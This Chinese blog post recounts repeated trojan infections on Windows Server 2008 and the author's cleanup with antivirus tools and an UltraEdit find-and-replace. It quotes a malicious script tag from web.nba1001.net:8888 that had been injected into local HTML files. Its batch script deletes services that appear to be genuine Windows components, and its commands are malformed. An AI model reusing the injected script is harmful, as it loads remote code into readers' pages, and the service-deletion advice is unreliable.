Windows木马防治“历险记”

一、遭遇木马

 

近日，偶在个人的NB上将Windows XP换成了Windows Server 2008。之前使用的卡巴在版本不支持Windows 2008。就打算换个Nod32（ESET Smart Security 4.0）试试。

 

Windows 2008确实比XP强悍，但后台运行的服务也比XP多。还没来得及细细品味Windows 2008所带来的喜悦与高性能，Win2008就中招了。

 

Nod32提示中毒，报警中木马了，硬盘指示狂闪。死机～，只得重启。汗～，木马驻入进程，还没来得及进入桌面，又自动重启了。这次完了，别把我硬盘数据又黑掉我了的吧？

重新启动电脑，F8进入安全模式，一看系统服务，果然多了几个陌生的服务：Ias、Irmon、Nla等。只好一个个手工清除掉。

C:/Windows/SYSTEM32/NWCWorkstation.dll

C:/Windows/SYSTEM32/Nla.dll

C:/Windows/SYSTEM32/Nwsapagent.dll

C:/Windows/System32/Ntmssvc.dll

……

 

用“Windows 清理助手”一查，发现好些个dll文件被感染了特洛伊木马：

（图1）

干掉！

真是郁闷。

 

二、再次“栽倒”

几天之后，又一次中招！而且是同样的马。

接连两次挂马，严重地干扰了偶的正常的IT生活和工作。对此，偶表示强烈的“谴责”和“抗议”。心想，应该是上次被感染的文件没有彻底清理掉，或者某个文件夹携带有病毒。

 

解决办法：

用NOD32 全面查杀一遍所有文件。

再用Windows 清理助手将系统扫一遍，发现中ReInstall.exe等几种病毒，清除！加上其他辅助工具：System Mechanic Pro5.5、优化大师WoptiUtilities，对系统进行清理和优化。然后，再装个木马清理王(AttMain.exe Ver5.00.3)把系统监控起来。

对比试用“Windows木马清道夫（防火墙）”，这玩意太占内存了（防护能力如何还不清楚）。

 

对系统“服务”进行清理。编个bat文件，删掉这些“服务”：

@echooff

echo正在清理系统木马“服务”，请稍等......

scdelete FastUserSwitchingCompatibility

scdelete Ias

scdelete Irmon

scdelete Nla

scdelete FastUserSwitchingCompatibility

scdelete Ntmssvc

scdelete NWCWorkstation

scdelete Nwsapagent

echo清理完成！

echo.& pause

 

 

 

三、想哭，哭不出来～

一周之后，系统再一次挂马！顶他大爷的肺～

我开始不相信“组织”了！难道NOD32对木马防护起的作用不大？木马清理王也不够强悍？

 

于是在网上搜啊，找啊，终于发现一款能有效对付木马的防毒软件AVG！它集合防病毒 + 防火墙，安全防护病毒、蠕虫、木马、黑客。

AVG反病毒软件9.0能实现安全、完美的防护，针对因特网上传播的新一代安全威胁，拥有有效的解决方案。

　　AVG反病毒软件9.0可确保您的数据安全，保护您的隐私，抵御间谍软件、广告软件、木马、拨号程序、键盘记录程序和蠕虫的威胁，对电子邮件及其附件进行实时监控，以防止计算机感染上病毒。在易于使用的界面之下，提供了高级的扫描和探测方式以及时下最尖端的技术。

 

下载，安装AVG Anti-Virus plus Firewall9.0，赶紧用AVG扫扫，哇靠～ 一下子查出600多个程序(EXE)被感染了特洛伊木马。

（图2）

赶紧咔嚓了。

 

在打开本地某个网页文件时，Chrome浏览器提示该网页有web.nba1001.net:8888恶意代码，网页被修改了，在每个网页最后多了一行代码，链接地址为

<script type="text/javascript"src="http://web.nba1001.net:8888/tj/tongji.js">

</script>

再次顶他大爷的～

 

Google一下，发现许多人反映（报告）也感染了nba 1001。但没指明具体的清除办法。这东西虽然不是很严重，但也影响偶看本地网页文件呀，保存下来的都是值得“珍藏”的好东西啊，而且这些好东西也要经常看看的。

 

那只好自己想办法了。

请出伴随偶多年的UltraEdit（以下简称UE），UE目前的最新版本为15.2。用它的全文检索功能逐一将这行脚本找出来并删除。

在资源管理器中选定目标，点击右键，选择“在文件中替换（在该目录）”，如图：

（图3）

在查找内容框中输入上述的脚本，替换为空就行了，文件类型输入：*.htm，然后勾选“搜索子目录”，按【全部替换】按钮，

（图4）

然后UE会弹出提示：“多文件替换可能会修改你磁盘中的多个文件……”，选择【是】，UE进行搜索，自动将这行脚本清除（替换）掉。

（图5）

在偶的机子上，光D盘就有5624个htm文件被挂马了。在搜索过程中，有时可能会出错，重来就是了。

其他盘或文件夹也用这方法，花点时间，基本上可以清除干净。

 

这几天下来，系统再没有发现有特洛伊木马了。AVG在防木马方面果然名不虚传，表现确实出色。系统也不需另外装防火墙了，AVG的Firewall 组件即可满足要求。

 

四、经验总结

网络有风险，“裸奔”需谨慎。在Windows系统“裸奔”是有风险的，并且应该打上必要的补丁。

检查任务管理器中是否有不熟悉的，或者来路不明的进程，如果有，干掉！

 

用Your Uninstaller 2010删除       /卸载不需要或不常用的软件程序，让系统保持相对“干净”。

（图6）

 

在CMD命令行中输入msconfig，查看，并去掉多余的启动项，当然也可用Your Uninstaller实用工具中的“启动管理器”来设置。

定期清除系统临时文件夹和/或系统垃圾：

C:/Windows/temp、C:/Users/XXXX/LocalSettings/temp

清除IE临时文件与缓存：

C:/Users/XXXX/AppData/Local/Microsoft/Windows/Temporary Internet Files

或者用“一键清理系统垃圾文件”批处理也行。 

用System Mechanic对系统垃圾清理；对C盘执行“磁盘清理”； 

停掉/关闭不常用的服务，以提升系统性能。 

最后，系统优化完成后，再次对系统盘Ghost一次。

 

几点建议：

形成良好的使用习惯，备份数据并GHOST系统，且需要把GHOST的GHO镜像扩展名改掉，需要还原的时候再修改过来。 

养成良好的使用杀毒软件和防火墙习惯，即：每个弹出窗口都要仔细查看并快速的判断，切不可随意“确认”、“OK”。 

为了计算机安全、尤其是账户安全，请定期使用本文的方法进行计算机病毒检查。